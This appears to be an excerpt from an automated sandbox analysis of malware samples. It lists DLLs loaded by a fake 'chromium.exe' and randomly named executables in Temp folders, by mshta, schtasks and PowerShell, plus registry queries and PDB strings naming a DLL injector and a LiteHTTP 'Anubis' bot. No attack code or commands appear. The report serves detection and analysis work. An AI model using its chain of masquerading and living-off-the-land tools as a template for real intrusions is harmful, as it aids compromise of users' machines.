Source: C:\Users\user\AppData\Local\Temp\onefile_7896_133856820214566652\chromium.exe	Section loaded: libcrypto-3.dll
Source: C:\Users\user\AppData\Local\Temp\onefile_7896_133856820214566652\chromium.exe	Section loaded: libssl-3.dll
Source: C:\Users\user\AppData\Local\Temp\onefile_7896_133856820214566652\chromium.exe	Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\onefile_7896_133856820214566652\chromium.exe	Section loaded: propsys.dll
Source: C:\Users\user\AppData\Local\Temp\onefile_7896_133856820214566652\chromium.exe	Section loaded: vcruntime140_1.dll
Source: C:\Users\user\AppData\Local\Temp\onefile_7896_133856820214566652\chromium.exe	Section loaded: libffi-8.dll
Source: C:\Users\user\AppData\Local\Temp\onefile_7896_133856820214566652\chromium.exe	Section loaded: pywintypes312.dll
Source: C:\Users\user\AppData\Local\Temp\onefile_7896_133856820214566652\chromium.exe	Section loaded: secur32.dll
Source: C:\Users\user\AppData\Local\Temp\onefile_7896_133856820214566652\chromium.exe	Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\onefile_7896_133856820214566652\chromium.exe	Section loaded: sqlite3.dll
Source: C:\Users\user\AppData\Local\Temp\onefile_7896_133856820214566652\chromium.exe	Section loaded: powrprof.dll
Source: C:\Users\user\AppData\Local\Temp\onefile_7896_133856820214566652\chromium.exe	Section loaded: pdh.dll
Source: C:\Users\user\AppData\Local\Temp\onefile_7896_133856820214566652\chromium.exe	Section loaded: python3.dll
Source: C:\Users\user\AppData\Local\Temp\onefile_7896_133856820214566652\chromium.exe	Section loaded: umpdc.dll
Source: C:\Users\user\AppData\Local\Temp\onefile_7896_133856820214566652\chromium.exe	Section loaded: wtsapi32.dll
Source: C:\Users\user\AppData\Local\Temp\onefile_7896_133856820214566652\chromium.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\10104900101\ce4pMzk.exe	Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Local\Temp\10104900101\ce4pMzk.exe	Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\10104900101\ce4pMzk.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\10104900101\ce4pMzk.exe	Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\10104900101\ce4pMzk.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\10104900101\ce4pMzk.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\10104900101\ce4pMzk.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\10104900101\ce4pMzk.exe	Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\10104900101\ce4pMzk.exe	Section loaded: amsi.dll
Source: C:\Users\user\AppData\Local\Temp\10104900101\ce4pMzk.exe	Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\Temp\10104900101\ce4pMzk.exe	Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\10104900101\ce4pMzk.exe	Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\10104900101\ce4pMzk.exe	Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Local\Temp\10104900101\ce4pMzk.exe	Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Local\Temp\10104900101\ce4pMzk.exe	Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Local\Temp\10104900101\ce4pMzk.exe	Section loaded: ntmarta.dll
Source: C:\Users\user\AppData\Local\Temp\10104900101\ce4pMzk.exe	Section loaded: wbemcomn.dll
Source: C:\Users\user\AppData\Local\Temp\10104900101\ce4pMzk.exe	Section loaded: rasapi32.dll
Source: C:\Users\user\AppData\Local\Temp\10104900101\ce4pMzk.exe	Section loaded: rasman.dll
Source: C:\Users\user\AppData\Local\Temp\10104900101\ce4pMzk.exe	Section loaded: rtutils.dll
Source: C:\Users\user\AppData\Local\Temp\10104900101\ce4pMzk.exe	Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\10104900101\ce4pMzk.exe	Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\Temp\10104900101\ce4pMzk.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\10104900101\ce4pMzk.exe	Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\10104900101\ce4pMzk.exe	Section loaded: dhcpcsvc6.dll
Source: C:\Users\user\AppData\Local\Temp\10104900101\ce4pMzk.exe	Section loaded: dhcpcsvc.dll
Source: C:\Users\user\AppData\Local\Temp\10104900101\ce4pMzk.exe	Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Local\Temp\10104900101\ce4pMzk.exe	Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Local\Temp\10104900101\ce4pMzk.exe	Section loaded: rasadhlp.dll
Source: C:\Users\user\AppData\Local\Temp\10104900101\ce4pMzk.exe	Section loaded: fwpuclnt.dll
Source: C:\Users\user\AppData\Local\Temp\10104900101\ce4pMzk.exe	Section loaded: secur32.dll
Source: C:\Users\user\AppData\Local\Temp\10104900101\ce4pMzk.exe	Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\10104900101\ce4pMzk.exe	Section loaded: schannel.dll
Source: C:\Users\user\AppData\Local\Temp\10104900101\ce4pMzk.exe	Section loaded: mskeyprotect.dll
Source: C:\Users\user\AppData\Local\Temp\10104900101\ce4pMzk.exe	Section loaded: ntasn1.dll
Source: C:\Users\user\AppData\Local\Temp\10104900101\ce4pMzk.exe	Section loaded: ncrypt.dll
Source: C:\Users\user\AppData\Local\Temp\10104900101\ce4pMzk.exe	Section loaded: ncryptsslp.dll
Source: C:\Users\user\AppData\Local\Temp\10104900101\ce4pMzk.exe	Section loaded: msasn1.dll
Source: C:\Users\user\AppData\Local\Temp\10104900101\ce4pMzk.exe	Section loaded: gpapi.dll
Source: C:\Users\user\AppData\Local\Temp\10106470101\zY9sqWs.exe	Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\10106470101\zY9sqWs.exe	Section loaded: msasn1.dll
Source: C:\Users\user\AppData\Local\Temp\10106670101\48dbed8457.exe	Section loaded: wsock32.dll
Source: C:\Users\user\AppData\Local\Temp\10106670101\48dbed8457.exe	Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\10106670101\48dbed8457.exe	Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Temp\10106670101\48dbed8457.exe	Section loaded: mpr.dll
Source: C:\Users\user\AppData\Local\Temp\10106670101\48dbed8457.exe	Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Temp\10106670101\48dbed8457.exe	Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\10106670101\48dbed8457.exe	Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\Temp\10106670101\48dbed8457.exe	Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\10106670101\48dbed8457.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\10106670101\48dbed8457.exe	Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\10106670101\48dbed8457.exe	Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\10106670101\48dbed8457.exe	Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: iertutil.dll
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: wldp.dll
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: mshtml.dll
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: powrprof.dll
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: winhttp.dll
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: wkscli.dll
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: umpdc.dll
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: cryptbase.dll
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: urlmon.dll
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: msiso.dll
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: uxtheme.dll
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: srpapi.dll
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: windows.storage.dll
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: wldp.dll
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: propsys.dll
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: msimtf.dll
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: dxgi.dll
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: resourcepolicyclient.dll
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: textinputframework.dll
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: coreuicomponents.dll
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: coremessaging.dll
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: ntmarta.dll
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: coremessaging.dll
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: wintypes.dll
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: wintypes.dll
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: wintypes.dll
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: dataexchange.dll
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: d3d11.dll
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: dcomp.dll
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: twinapi.appcore.dll
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: jscript9.dll
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: mpr.dll
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: scrrun.dll
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: version.dll
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: sxs.dll
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: edputil.dll
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: windows.staterepositoryps.dll
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: appresolver.dll
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: bcp47langs.dll
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: slc.dll
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: sppc.dll
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: onecorecommonproxystub.dll
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: msls31.dll
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: d2d1.dll
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: dwrite.dll
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: taskschd.dll
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: xmllite.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasapi32.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasman.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rtutils.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mswsock.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winhttp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iphlpapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dhcpcsvc6.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dhcpcsvc.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dnsapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: edputil.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.staterepositoryps.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wintypes.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appresolver.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: bcp47langs.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: slc.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sppc.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: onecorecommonproxystub.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: apphelp.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: wldp.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: mshtml.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: iertutil.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: powrprof.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: winhttp.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: wkscli.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: umpdc.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: urlmon.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: srvcli.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: msiso.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: uxtheme.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: srpapi.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: windows.storage.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: wldp.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: propsys.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: msimtf.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: dxgi.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: resourcepolicyclient.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: textinputframework.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: coreuicomponents.dll

Source: C:\Windows\SysWOW64\mshta.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{25336920-03F9-11CF-8FD0-00AA00686F13}\InProcServer32

Jump to behavior

Source: C:\Windows\SysWOW64\mshta.exe

Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Internet Explorer\Settings

Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll

Jump to behavior

Source: 5c9465cda4.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
Source: 5c9465cda4.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
Source: 5c9465cda4.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
Source: 5c9465cda4.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: 5c9465cda4.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
Source: 5c9465cda4.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT

Source: 5c9465cda4.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

Source:	Binary string: D:\a\1\b\bin\amd64\python312.pdb source: SvhQA35.exe, 00000018.00000003.2441096547.00000235AB10A000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: D:\a\1\b\bin\amd64\unicodedata.pdb source: SvhQA35.exe, 00000018.00000003.2441096547.00000235AB6F8000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: D:\a\1\b\libssl-3.pdbDD source: SvhQA35.exe, 00000018.00000003.2441096547.00000235AAC88000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: D:\a\pywin32\pywin32\build\temp.win-amd64-cpython-312\Release\pythoncom.pdb}},GCTL source: SvhQA35.exe, 00000018.00000003.2441096547.00000235AB389000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: @ compiler: cl /Zi /Fdossl_static.pdb /Gs0 /GF /Gy /MD /W3 /wd4090 /nologo /O2 -DL_ENDIAN -DOPENSSL_PIC -D"OPENSSL_BUILDING_OPENSSL" -D"OPENSSL_SYS_WIN32" -D"WIN32_LEAN_AND_MEAN" -D"UNICODE" -D"_UNICODE" -D"_CRT_SECURE_NO_DEPRECATE" -D"_WINSOCK_DEPRECATED_NO_WARNINGS" -D"NDEBUG"OpenSSL 3.0.15 3 Sep 20243.0.15built on: Wed Sep 4 15:52:04 2024 UTCplatform: VC-WIN64A-masmOPENSSLDIR: "C:\Program Files\Common Files\SSL"ENGINESDIR: "C:\Program Files\OpenSSL\lib\engines-3"MODULESDIR: "C:\Program Files\OpenSSL\lib\ossl-modules"CPUINFO: N/Anot availableget_and_lock..\s\crypto\ex_data.cossl_crypto_get_ex_new_index_exossl_crypto_new_ex_data_exCRYPTO_dup_ex_dataCRYPTO_set_ex_dataOPENSSL_WIN32_UTF8..\s\crypto\getenv.ccompiler: cl /Zi /Fdossl_static.pdb /Gs0 /GF /Gy /MD /W3 /wd4090 /nologo /O2 -DL_ENDIAN -DOPENSSL_PIC -D"OPENSSL_BUILDING_OPENSSL" -D"OPENSSL_SYS_WIN32" -D"WIN32_LEAN_AND_MEAN" -D"UNICODE" -D"_UNICODE" -D"_CRT_SECURE_NO_DEPRECATE" -D"_WINSOCK_DEPRECATED_NO_WARNINGS" -D"NDEBUG";CPUINFO: OPENSSL_ia32cap=0x%llx:0x%llxOPENSSL_ia32cap env:%sos-specificC:\Program Files\Common Files\SSLC:\Program Files\OpenSSL\lib\ossl-modules.dllCPUINFO: ..\s\crypto\init.cOPENSSL_init_cryptoOPENSSL_atexit..\s\crypto\initthread.c..\s\crypto\mem_sec.cassertion failed: (bit & 1) == 0assertion failed: list >= 0 && list < sh.freelist_sizeassertion failed: ((ptr - sh.arena) & ((sh.arena_size >> list) - 1)) == 0assertion failed: bit > 0 && bit < sh.bittable_sizeassertion failed: TESTBIT(table, bit)assertion failed: !TESTBIT(table, bit)assertion failed: WITHIN_FREELIST(list)assertion failed: WITHIN_ARENA(ptr)assertion failed: temp->next == NULL \|\| WITHIN_ARENA(temp->next)assertion failed: (char *)temp->next->p_next == listassertion failed: WITHIN_FREELIST(temp2->p_next) \|\| WITHIN_ARENA(temp2->p_next)assertion failed: size > 0assertion failed: (size & (size - 1)) == 0assertion failed: (minsize & (minsize - 1)) == 0assertion failed: sh.freelist != NULLassertion failed: sh.bittable != NULLassertion failed: sh.bitmalloc != NULLassertion failed: !sh_testbit(temp, slist, sh.bitmalloc)assertion failed: temp != sh.freelist[slist]assertion failed: sh.freelist[slist] == tempassertion failed: temp-(sh.arena_size >> slist) == sh_find_my_buddy(temp, slist)assertion failed: sh_testbit(chunk, list, sh.bittable)assertion failed: WITHIN_ARENA(chunk)assertion failed: sh_testbit(ptr, list, sh.bittable)assertion failed: ptr == sh_find_my_buddy(buddy, list)assertion failed: ptr != NULLassertion failed: !sh_testbit(ptr, list, sh.bitmalloc)assertion failed: sh.freelist[list] == ptr/0123456789ABCDEFCRYPTO_memdup..\s\crypto\o_str.chexstr2buf_sepossl_hexstr2buf_sepbuf2hexstr_sepossl_buf2hexstr_sep..\s\crypto\packet.cwpacket_intern_init_lenWPACKET_start_sub_packet_len__..\s\crypto\param_build.cparam_pushparam_push_numOSSL_PARAM_BLD_push_BN_padNegative big numbers are unsupported for OSSL_PARAMOSSL_PARAM_BLD_push_utf8_stringOSSL_PARAM_BLD_push_utf8_ptrOSSL_PARAM_BLD_push_octet_stringOSSL_PARAM_BLD_p
Source:	Binary string: D:\a\1\b\bin\amd64\_overlapped.pdb source: SvhQA35.exe, 00000018.00000003.2441096547.00000235AA663000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: D:\a\_work\1\s\binaries\amd64ret\bin\amd64\\vcruntime140.amd64.pdb source: SvhQA35.exe, 00000018.00000003.2441096547.00000235AB6F8000.00000004.00000020.00020000.00000000.sdmp, chromium.exe, 0000001B.00000002.2569114412.00007FFE1A543000.00000002.00000001.01000000.00000014.sdmp
Source:	Binary string: compiler: cl /Zi /Fdossl_static.pdb /Gs0 /GF /Gy /MD /W3 /wd4090 /nologo /O2 -DL_ENDIAN -DOPENSSL_PIC -D"OPENSSL_BUILDING_OPENSSL" -D"OPENSSL_SYS_WIN32" -D"WIN32_LEAN_AND_MEAN" -D"UNICODE" -D"_UNICODE" -D"_CRT_SECURE_NO_DEPRECATE" -D"_WINSOCK_DEPRECATED_NO_WARNINGS" -D"NDEBUG" source: SvhQA35.exe, 00000018.00000003.2441096547.00000235AAA77000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: D:\a\_work\1\s\binaries\amd64ret\bin\amd64\\vcruntime140.amd64.pdbGCTL source: SvhQA35.exe, 00000018.00000003.2441096547.00000235AB6F8000.00000004.00000020.00020000.00000000.sdmp, chromium.exe, 0000001B.00000002.2569114412.00007FFE1A543000.00000002.00000001.01000000.00000014.sdmp
Source:	Binary string: D:\a\1\b\bin\amd64\sqlite3.pdb source: SvhQA35.exe, 00000018.00000003.2441096547.00000235AB389000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: D:\a\pywin32\pywin32\build\temp.win-amd64-cpython-312\Release\pywintypes.pdb source: SvhQA35.exe, 00000018.00000003.2441096547.00000235AB389000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: D:\a\pywin32\pywin32\build\temp.win-amd64-cpython-312\Release\pywintypes.pdb** source: SvhQA35.exe, 00000018.00000003.2441096547.00000235AB389000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: D:\a\1\b\bin\amd64\_multiprocessing.pdb source: SvhQA35.exe, 00000018.00000003.2441096547.00000235AA663000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\Badus\OneDrive\Desktop\DLLInjector\DllExecutorApp\DllExecutorApp\obj\Debug\Anubis.pdb source: ce4pMzk.exe, 0000001C.00000000.2468317844.0000021039BD2000.00000002.00000001.01000000.00000024.sdmp
Source:	Binary string: D:\a\_work\1\s\binaries\amd64ret\bin\amd64\\vcruntime140_1.amd64.pdb source: SvhQA35.exe, 00000018.00000003.2441096547.00000235AB6F8000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: D:\a\1\b\bin\amd64\select.pdb source: SvhQA35.exe, 00000018.00000003.2441096547.00000235AB389000.00000004.00000020.00020000.00000000.sdmp, chromium.exe, 0000001B.00000002.2567650557.00007FFE1A503000.00000002.00000001.01000000.00000016.sdmp
Source:	Binary string: D:\a\pywin32\pywin32\build\temp.win-amd64-cpython-312\Release\pythoncom.pdb source: SvhQA35.exe, 00000018.00000003.2441096547.00000235AB389000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: D:\a\1\b\bin\amd64\_ctypes.pdb source: chromium.exe, 0000001B.00000002.2563305426.00007FFE12261000.00000002.00000001.01000000.00000025.sdmp
Source:	Binary string: D:\a\1\b\bin\amd64\_hashlib.pdb source: chromium.exe, 0000001B.00000002.2563783574.00007FFE126E7000.00000002.00000001.01000000.0000001D.sdmp
Source:	Binary string: D:\a\1\b\bin\amd64\_lzma.pdbNN source: SvhQA35.exe, 00000018.00000003.2441096547.00000235AA663000.00000004.00000020.00020000.00000000.sdmp, chromium.exe, 0000001B.00000002.2562381276.00007FFE11EBC000.00000002.00000001.01000000.00000020.sdmp
Source:	Binary string: D:\a\1\b\bin\amd64\_uuid.pdb source: SvhQA35.exe, 00000018.00000003.2441096547.00000235AA663000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: D:\a\1\b\bin\amd64\pyexpat.pdb source: SvhQA35.exe, 00000018.00000003.2441096547.00000235AAC88000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\Badus\OneDrive\Desktop\Bot1.0.9\Bot\LiteHTTP\obj\x86\Debug\Anubis.pdb@ source: ce4pMzk.exe, 0000001C.00000000.2468317844.0000021039BD2000.00000002.00000001.01000000.00000024.sdmp
Source:	Binary string: D:\a\1\b\bin\amd64\_queue.pdb source: SvhQA35.exe, 00000018.00000003.2441096547.00000235AA663000.00000004.00000020.00020000.00000000.sdmp, chromium.exe, 0000001B.00000002.2565474639.00007FFE13303000.00000002.00000001.01000000.0000001E.sdmp
Source:	Binary string: D:\a\1\b\bin\amd64\_lzma.pdb source: SvhQA35.exe, 00000018.00000003.2441096547.00000235AA663000.00000004.00000020.00020000.00000000.sdmp, chromium.exe, 0000001B.00000002.2562381276.00007FFE11EBC000.00000002.00000001.01000000.00000020.sdmp
Source:	Binary string: D:\a\1\b\bin\amd64\_bz2.pdb source: chromium.exe, 0000001B.00000002.2563564294.00007FFE126CE000.00000002.00000001.01000000.0000001F.sdmp
Source:	Binary string: D:\a\1\b\bin\amd64\_wmi.pdb source: SvhQA35.exe, 00000018.00000003.2441096547.00000235AA663000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\Badus\OneDrive\Desktop\Bot1.0.9\Bot\LiteHTTP\obj\x86\Debug\Anubis.pdb source: ce4pMzk.exe, 0000001C.00000000.2468317844.0000021039BD2000.00000002.00000001.01000000.00000024.sdmp
